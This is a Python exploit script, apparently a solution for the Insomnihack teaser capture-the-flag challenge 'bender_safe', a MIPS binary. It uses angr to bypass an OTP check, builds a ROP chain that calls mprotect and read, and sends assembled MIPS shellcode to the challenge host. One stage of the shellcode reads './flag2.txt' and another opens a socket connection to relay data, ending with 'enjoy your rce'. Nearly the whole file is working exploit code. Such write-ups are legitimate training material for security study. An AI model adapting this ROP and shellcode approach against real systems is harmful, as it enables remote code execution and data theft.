import phun import angr import socket bad_addreses = (0x0401DDC,0x0401F2C,0x04020C4,0x0402264,0x0402418,0x04024B0, 0x0402650,0x04026E8,0x04028B4,0x0402A84,0x0402C44,0x0402CDC) def do_otp(chall): chall_addr = 0x04A5B98 asnwr_addr = 0x04A5C10 p = angr.Project('./bender_safe',load_options={'auto_load_libs': False}) state = p.factory.blank_state(addr=0x401C50) chall_s = map(lambda x:state.se.BVV(ord(x),8),chall) ans_s = [] x = [ state.memory.store(chall_addr+i,chall_s[i]) for i in range(len(chall_s)) ] for i in range(8): a = state.se.BVS('a%d'%i,8) ans_s.append(a) state.memory.store(asnwr_addr+i,a) state.regs.a0 = chall_addr state.regs.a1 = asnwr_addr pg = p.factory.path_group(state) pg.explore(find=(0x402D0C,),avoid=bad_addreses) s = pg.found[0].state return s.se.any_str(s.memory.load(asnwr_addr, 9)) def menu(r,n): r.read("4. Exit") r.read("\n") r.readline() r.readline() r.sendline(str(n)) def view_passwd(r,max): menu(r,1) print r.read(1024) for _ in range(max): r.read("Password ") print `r.read(":").strip()` print `r.readline()` def add_passwd(r,x,passes): menu(r,2) r.read(" : ") r.sendline(str(x)) print '[*]',r.readline(), r.read('line ') for p in passes: r.write(p) def asm(script): import keystone as _ks k = _ks.Ks(_ks.KS_ARCH_MIPS,_ks.KS_MODE_MIPS32+ _ks.KS_MODE_BIG_ENDIAN) return ''.join(map(chr,k.asm(script)[0])) def stage2(): sh=asm('''addiu $t9, $zero, -2 not $s0, $t9 addiu $a1, $zero, 0 li $a0, 0x4a5060 ori $v0, $zero, 0xfa5 syscall 0x40404 move $s1, $v0 li $t0, 0x4a6000 addiu $a2, $zero, 0x400 move $a1, $t0 move $a0, $s1 ori $v0, $zero, 0xfa3 syscall 0x40404 li $t0, 0x4a6000 addiu $a2, $zero, 0x400 move $a1, $t0 move $a0, $s0 ori $v0, $zero, 0xfa4 syscall 0x40404 move $t0, $zero teqi $t0, 0 ''') sh+="./flag2.txt\x00" return sh,17 def stage3(): sh=asm(''' li $t9, ~1 not $s0, $t9 li $s5,1024 li $a1,2 li $a0,2 move $a2,$zero move $a3,$zero ori $v0,$zero,4183 syscall 0x40404 move $s1,$v0 li $a2,16 li $a1, 0x4a50c0 move $a0,$s1 ori $v0,$zero,4170 syscall 0x40404 li $t0, 0x4a6000 move $a2,$s5 move $a1,$t0 move $a0,$s1 ori $v0, $zero, (4175) syscall 0x40404 li $t3, 0x430d0909 addiu $t3,0x101 sw $t3, -512($sp) li $a2,4 addu $a1,$sp,-512 move $a0,$s1 ori $v0, $zero, (4178) syscall 0x40404 li $t0, 0x4a6000 move $a2,$s5 move $a1,$t0 move $a0,$s1 ori $v0, $zero, (4175) syscall 0x40404 li $t0, 0x4a6000 move $a2,$s5 move $a1,$t0 move $a0,$s0 ori $v0, $zero, (4004) syscall 0x40404 move $t0,$zero teqi $t0,0 ''') sh +=(phun.p16(2,31337,fmt='>') + socket.inet_pton(2, '127.0.0.1')).ljust(16,"\x00") return sh,7 sh,cnt=stage2() print '[+] shellcode compiled - size:%d' % len(sh) mprotect=0x041E8BC read = 0x04015DC addr = 0x04A59A0&~0xfff r = phun.Remote('bender_safe.teaser.insomnihack.ch', 31337) r.read(': \n') chall=r.readline().strip() r.write(do_otp(chall)) r.read('HiHiHi!\n') print '[+] otp cleared' p0 = "\x00"*3 + phun.p32(0x046B39C,fmt='>') p0 += "A"*0x18 + phun.p32(addr,0x040F434,fmt='>') p0 += "B"*0x20 + phun.p32(1024*4,0,0,0x046DFFC,fmt='>') p0 += "C"*0x33 + phun.p32(0,mprotect,7,read,0x041E994,fmt='>') p0 += "D"*(0x1c-5) + phun.p32(0,0,0,0x044F220,fmt='>') p0 += "E"*0x1c + phun.p32(0,len(sh),addr,read,0x0476F04 ,fmt='>') p0 = p0.ljust(3*102,"X") print '[+] rop setted up' add_passwd(r,13,["\n"] + ["\x00"*102]*9 +[p0]) menu(r,4) print '[+] enojoy your rce!' r.write(sh) r.read("--\n ") print '[+] here is your flag' print '',r.readlines(cnt) r.close()